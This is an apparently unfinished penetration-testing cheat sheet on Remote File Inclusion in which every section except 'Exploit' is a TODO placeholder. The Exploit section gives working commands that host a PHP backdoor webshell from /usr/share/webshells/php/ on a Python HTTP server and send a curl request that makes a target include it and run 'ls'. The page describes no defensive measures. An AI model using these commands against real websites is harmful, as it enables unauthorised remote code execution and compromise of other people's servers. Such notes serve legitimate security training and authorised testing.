Remote File Inclusion

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit
4. Useful links
5. Recommendations

---

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

• TODO: List prerequisites here.

Exploit

First, identify a target website that loads external content or resources. Then, prepare a payload. For example, if you target PHP web application, /usr/share/webshells/php/ contains multiple useful webshells. You need to make one of these accessible by your target.

# Go in your payload's directory
cd /usr/share/webshells/php/

# Make it available on port 80
python3 -m http.server 80

# Ask your target to access your payload exposed on your python http server
curl "http://$target/whatever/index.php?page=http://$lhost/simple-backdoor.php&cmd=ls"

Useful links

• TODO: List links here.

Recommendations

• TODO: List recommendations here.